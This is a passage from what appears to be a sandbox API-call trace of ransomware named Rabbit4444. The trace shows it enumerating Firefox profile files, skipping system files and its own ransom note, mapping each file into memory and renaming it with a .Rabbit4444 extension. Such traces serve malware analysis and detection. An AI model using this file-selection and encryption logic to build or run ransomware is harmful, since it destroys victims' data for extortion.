ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0x47330f8, ftLastWriteTime.dwHighDateTime=0x1d327ca, nFileSizeHigh=0x0, nFileSizeLow=0x36e8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="search.json.mozlz4", cAlternateFileName="SEARCH~1.MOZ")) returned 1 [0051.827] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.827] lstrcmpiW (lpString1="search.json.mozlz4", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.827] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="Rabbit4444.exe") returned 1 [0051.827] lstrcmpiW (lpString1="search.json.mozlz4", lpString2=".") returned 1 [0051.827] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="..") returned 1 [0051.827] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="windows") returned -1 [0051.827] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="bootmgr") returned 1 [0051.827] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="pagefile.sys") returned 1 [0051.827] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="boot") returned 1 [0051.827] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="ids.txt") returned 1 [0051.827] lstrcmpiW (lpString1="search.json.mozlz4", lpString2="NTUSER.DAT") returned 1 [0051.827] lstrcpyW (in: lpString1=0x130ebcc, lpString2="search.json.mozlz4" | out: lpString1="search.json.mozlz4") returned="search.json.mozlz4" [0051.827] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\search.json.mozlz4", dwFileAttributes=0x0) returned 1 [0051.828] lstrlenW (lpString="search.json.mozlz4") returned 18 [0051.828] lstrlenW (lpString="Rabbit4444") returned 10 [0051.828] lstrcmpiW (lpString1="son.mozlz4", lpString2="Rabbit4444") returned 1 [0051.828] lstrlenW (lpString=".dll") returned 4 [0051.828] lstrcmpiW (lpString1="zlz4", lpString2=".dll") returned 1 [0051.828] lstrlenW (lpString=".lnk") returned 4 [0051.828] lstrcmpiW (lpString1="zlz4", lpString2=".lnk") returned 1 [0051.828] lstrlenW (lpString=".ini") returned 4 [0051.828] lstrcmpiW (lpString1="zlz4", lpString2=".ini") returned 1 [0051.828] lstrlenW (lpString=".sys") returned 4 [0051.828] lstrcmpiW (lpString1="zlz4", lpString2=".sys") returned 1 [0051.828] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\search.json.mozlz4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\search.json.mozlz4"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0051.829] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0051.829] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14313938765) returned 1 [0051.829] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=14056) returned 1 [0051.829] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0051.829] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c88 [0051.829] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x39f0, lpName=0x0) returned 0x298 [0051.831] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x39f0) returned 0x70000 [0051.832] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0051.833] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0051.833] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0051.833] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0051.833] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0051.833] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0051.833] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0051.833] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0051.833] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14314374161) returned 1 [0051.833] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0051.833] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c88 | out: hHeap=0xe0000) returned 1 [0051.833] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0051.833] CloseHandle (hObject=0x298) returned 1 [0051.833] CloseHandle (hObject=0x278) returned 1 [0051.833] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\search.json.mozlz4.Rabbit4444") returned 103 [0051.833] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\search.json.mozlz4" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\search.json.mozlz4"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\search.json.mozlz4.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\search.json.mozlz4.rabbit4444"), dwFlags=0x1) returned 1 [0051.834] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe5f9955, ftCreationTime.dwHighDateTime=0x1d327c9, ftLastAccessTime.dwLowDateTime=0xfe5f9955, ftLastAccessTime.dwHighDateTime=0x1d327c9, ftLastWriteTime.dwLowDateTime=0xfe645e15, ftLastWriteTime.dwHighDateTime=0x1d327c9, nFileSizeHigh=0x0, nFileSizeLow=0x4000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="secmod.db", cAlternateFileName="")) returned 1 [0051.834] lstrcmpiW (lpString1="secmod.db", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.834] lstrcmpiW (lpString1="secmod.db", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.834] lstrcmpiW (lpString1="secmod.db", lpString2="Rabbit4444.exe") returned 1 [0051.834] lstrcmpiW (lpString1="secmod.db", lpString2=".") returned 1 [0051.834] lstrcmpiW (lpString1="secmod.db", lpString2="..") returned 1 [0051.834] lstrcmpiW (lpString1="secmod.db", lpString2="windows") returned -1 [0051.834] lstrcmpiW (lpString1="secmod.db", lpString2="bootmgr") returned 1 [0051.834] lstrcmpiW (lpString1="secmod.db", lpString2="pagefile.sys") returned 1 [0051.834] lstrcmpiW (lpString1="secmod.db", lpString2="boot") returned 1 [0051.834] lstrcmpiW (lpString1="secmod.db", lpString2="ids.txt") returned 1 [0051.834] lstrcmpiW (lpString1="secmod.db", lpString2="NTUSER.DAT") returned 1 [0051.834] lstrcpyW (in: lpString1=0x130ebcc, lpString2="secmod.db" | out: lpString1="secmod.db") returned="secmod.db" [0051.834] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\secmod.db", dwFileAttributes=0x0) returned 1 [0051.835] lstrlenW (lpString="secmod.db") returned 9 [0051.835] lstrlenW (lpString="Rabbit4444") returned 10 [0051.835] lstrcmpiW (lpString1="", lpString2="Rabbit4444") returned -1 [0051.835] lstrlenW (lpString=".dll") returned 4 [0051.835] lstrcmpiW (lpString1="d.db", lpString2=".dll") returned 1 [0051.835] lstrlenW (lpString=".lnk") returned 4 [0051.835] lstrcmpiW (lpString1="d.db", lpString2=".lnk") returned 1 [0051.835] lstrlenW (lpString=".ini") returned 4 [0051.835] lstrcmpiW (lpString1="d.db", lpString2=".ini") returned 1 [0051.835] lstrlenW (lpString=".sys") returned 4 [0051.835] lstrcmpiW (lpString1="d.db", lpString2=".sys") returned 1 [0051.835] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\secmod.db" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\secmod.db"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0051.835] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0051.835] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14314576705) returned 1 [0051.835] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=16384) returned 1 [0051.835] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117950 [0051.835] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0051.835] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4300, lpName=0x0) returned 0x298 [0051.836] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4300) returned 0x70000 [0051.838] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0051.838] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0051.838] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0051.838] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0051.838] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0051.838] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0051.838] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0051.838] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0051.838] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14314918911) returned 1 [0051.838] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117950 | out: hHeap=0xe0000) returned 1 [0051.839] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x102040 | out: hHeap=0xe0000) returned 1 [0051.839] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0051.839] CloseHandle (hObject=0x298) returned 1 [0051.839] CloseHandle (hObject=0x278) returned 1 [0051.839] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\secmod.db.Rabbit4444") returned 94 [0051.839] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\secmod.db" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\secmod.db"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\secmod.db.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\secmod.db.rabbit4444"), dwFlags=0x1) returned 1 [0051.839] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143f0f49, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x143f0f49, ftLastAccessTime.dwHighDateTime=0x1d327ca, ftLastWriteTime.dwLowDateTime=0xb81085d6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SecurityPreloadState.txt", cAlternateFileName="SECURI~1.TXT")) returned 1 [0051.839] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.839] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.840] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="Rabbit4444.exe") returned 1 [0051.840] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2=".") returned 1 [0051.840] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="..") returned 1 [0051.840] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="windows") returned -1 [0051.840] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="bootmgr") returned 1 [0051.840] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="pagefile.sys") returned 1 [0051.840] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="boot") returned 1 [0051.840] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="ids.txt") returned 1 [0051.840] lstrcmpiW (lpString1="SecurityPreloadState.txt", lpString2="NTUSER.DAT") returned 1 [0051.840] lstrcpyW (in: lpString1=0x130ebcc, lpString2="SecurityPreloadState.txt" | out: lpString1="SecurityPreloadState.txt") returned="SecurityPreloadState.txt" [0051.840] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\SecurityPreloadState.txt", dwFileAttributes=0x0) returned 1 [0051.840] lstrlenW (lpString="SecurityPreloadState.txt") returned 24 [0051.840] lstrlenW (lpString="Rabbit4444") returned 10 [0051.841] lstrcmpiW (lpString1="dState.txt", lpString2="Rabbit4444") returned -1 [0051.841] lstrlenW (lpString=".dll") returned 4 [0051.841] lstrcmpiW (lpString1=".txt", lpString2=".dll") returned 1 [0051.841] lstrlenW (lpString=".lnk") returned 4 [0051.841] lstrcmpiW (lpString1=".txt", lpString2=".lnk") returned 1 [0051.841] lstrlenW (lpString=".ini") returned 4 [0051.841] lstrcmpiW (lpString1=".txt", lpString2=".ini") returned 1 [0051.841] lstrlenW (lpString=".sys") returned 4 [0051.841] lstrcmpiW (lpString1=".txt", lpString2=".sys") returned 1 [0051.841] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7e0d6ab, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb8154a58, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb8154a58, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x120, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sessionCheckpoints.json", cAlternateFileName="SESSIO~1.JSO")) returned 1 [0051.841] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.841] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.841] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="Rabbit4444.exe") returned 1 [0051.841] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2=".") returned 1 [0051.841] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="..") returned 1 [0051.841] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="windows") returned -1 [0051.841] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="bootmgr") returned 1 [0051.841] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="pagefile.sys") returned 1 [0051.841] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="boot") returned 1 [0051.841] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="ids.txt") returned 1 [0051.841] lstrcmpiW (lpString1="sessionCheckpoints.json", lpString2="NTUSER.DAT") returned 1 [0051.841] lstrcpyW (in: lpString1=0x130ebcc, lpString2="sessionCheckpoints.json" | out: lpString1="sessionCheckpoints.json") returned="sessionCheckpoints.json" [0051.841] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionCheckpoints.json", dwFileAttributes=0x0) returned 1 [0051.842] lstrlenW (lpString="sessionCheckpoints.json") returned 23 [0051.842] lstrlenW (lpString="Rabbit4444") returned 10 [0051.842] lstrcmpiW (lpString1="oints.json", lpString2="Rabbit4444") returned -1 [0051.842] lstrlenW (lpString=".dll") returned 4 [0051.842] lstrcmpiW (lpString1="json", lpString2=".dll") returned 1 [0051.842] lstrlenW (lpString=".lnk") returned 4 [0051.842] lstrcmpiW (lpString1="json", lpString2=".lnk") returned 1 [0051.842] lstrlenW (lpString=".ini") returned 4 [0051.842] lstrcmpiW (lpString1="json", lpString2=".ini") returned 1 [0051.842] lstrlenW (lpString=".sys") returned 4 [0051.842] lstrcmpiW (lpString1="json", lpString2=".sys") returned 1 [0051.842] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionCheckpoints.json" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\sessioncheckpoints.json"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0051.842] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0051.842] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14315305375) returned 1 [0051.842] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=288) returned 1 [0051.842] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117d10 [0051.842] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101fb8 [0051.842] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x420, lpName=0x0) returned 0x298 [0051.844] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x420) returned 0x70000 [0051.845] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0051.845] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0051.845] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0051.845] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0051.845] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0051.846] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0051.846] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0051.846] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0051.846] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14315659237) returned 1 [0051.846] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117d10 | out: hHeap=0xe0000) returned 1 [0051.846] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101fb8 | out: hHeap=0xe0000) returned 1 [0051.846] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0051.846] CloseHandle (hObject=0x298) returned 1 [0051.846] CloseHandle (hObject=0x278) returned 1 [0051.846] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionCheckpoints.json.Rabbit4444") returned 108 [0051.846] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionCheckpoints.json" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\sessioncheckpoints.json"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionCheckpoints.json.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\sessioncheckpoints.json.rabbit4444"), dwFlags=0x1) returned 1 [0051.847] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6368e07, ftCreationTime.dwHighDateTime=0x1d327ca, ftLastAccessTime.dwLowDateTime=0x7794358d, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb7ea601f, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sessionstore-backups", cAlternateFileName="SESSIO~1")) returned 1 [0051.847] lstrcmpiW (lpString1="sessionstore-backups", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.847] lstrcmpiW (lpString1="sessionstore-backups", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.847] lstrcmpiW (lpString1="sessionstore-backups", lpString2="Rabbit4444.exe") returned 1 [0051.847] lstrcmpiW (lpString1="sessionstore-backups", lpString2=".") returned 1 [0051.847] lstrcmpiW (lpString1="sessionstore-backups", lpString2="..") returned 1 [0051.847] lstrcmpiW (lpString1="sessionstore-backups", lpString2="windows") returned -1 [0051.847] lstrcmpiW (lpString1="sessionstore-backups", lpString2="bootmgr") returned 1 [0051.847] lstrcmpiW (lpString1="sessionstore-backups", lpString2="pagefile.sys") returned 1 [0051.847] lstrcmpiW (lpString1="sessionstore-backups", lpString2="boot") returned 1 [0051.847] lstrcmpiW (lpString1="sessionstore-backups", lpString2="ids.txt") returned 1 [0051.847] lstrcmpiW (lpString1="sessionstore-backups", lpString2="NTUSER.DAT") returned 1 [0051.847] lstrcpyW (in: lpString1=0x130ebcc, lpString2="sessionstore-backups" | out: lpString1="sessionstore-backups") returned="sessionstore-backups" [0051.847] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0xf6928 [0051.847] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xbe) returned 0xf12e0 [0051.847] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0xf6930 | out: ListHead=0xf68b0, ListEntry=0xf6930) returned 0xf6590 [0051.847] FindNextFileW (in: hFindFile=0x102810, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7e7fd9e, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xb7e7fd9e, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xb7e7fd9e, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1433, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="sessionstore.js", cAlternateFileName="SESSIO~1.JS")) returned 1 [0051.847] lstrcmpiW (lpString1="sessionstore.js", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0051.847] lstrcmpiW (lpString1="sessionstore.js", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0051.847] lstrcmpiW (lpString1="sessionstore.js", lpString2="Rabbit4444.exe") returned 1 [0051.847] lstrcmpiW (lpString1="sessionstore.js", lpString2=".") returned 1 [0051.847] lstrcmpiW (lpString1="sessionstore.js", lpString2="..") returned 1 [0051.847] lstrcmpiW (lpString1="sessionstore.js", lpString2="windows") returned -1 [0051.847] lstrcmpiW (lpString1="sessionstore.js", lpString2="bootmgr") returned 1 [0051.847] lstrcmpiW (lpString1="sessionstore.js", lpString2="pagefile.sys") returned 1 [0051.847] lstrcmpiW (lpString1="sessionstore.js", lpString2="boot") returned 1 [0051.847] lstrcmpiW (lpString1="sessionstore.js", lpString2="ids.txt") returned 1 [0051.847] lstrcmpiW (lpString1="sessionstore.js", lpString2="NTUSER.DAT") returned 1 [0051.848] lstrcpyW (in: lpString1=0x130ebcc, lpString2="sessionstore.js" | out: lpString1="sessionstore.js") returned="sessionstore.js" [0051.848] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore.js", dwFileAttributes=0x0) returned 1 [0051.848] lstrlenW (lpString="sessionstore.js") returned 15 [0051.848] lstrlenW (lpString="Rabbit4444") returned 10 [0051.848] lstrcmpiW (lpString1="onstore.js", lpString2="Rabbit4444") returned -1 [0051.848] lstrlenW (lpString=".dll") returned 4 [0051.848] lstrcmpiW (lpString1="e.js", lpString2=".dll") returned 1 [0051.848] lstrlenW (lpString=".lnk") returned 4 [0051.848] lstrcmpiW (lpString1="e.js", lpString2=".lnk") returned 1 [0051.848] lstrlenW (lpString=".ini") returned 4 [0051.848] lstrcmpiW (lpString1="e.js", lpString2=".ini") returned 1 [0051.848] lstrlenW (lpString=".sys") returned 4 [0051.848] lstrcmpiW (lpString1="e.js", lpString2=".sys") returned 1 [0051.848] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\w7cr0hor.default\\sessionstore.js" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\mozilla\\firefox\\profiles\\w7cr0hor.default\\sessionstore.js"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0051.848] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0051.848] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14315900977) returned 1 [0051.848] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=5171) returned 1 [0051.848] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0051.848] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x102040 [0051.848] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1740, lpName=0x0) returned 0x298 [0051.852] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1740) returned 0x70000 [0051.854] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x10c928 [0051.854] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0051.854] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0051.854] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0051.854] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0051.854] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0051.854] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | 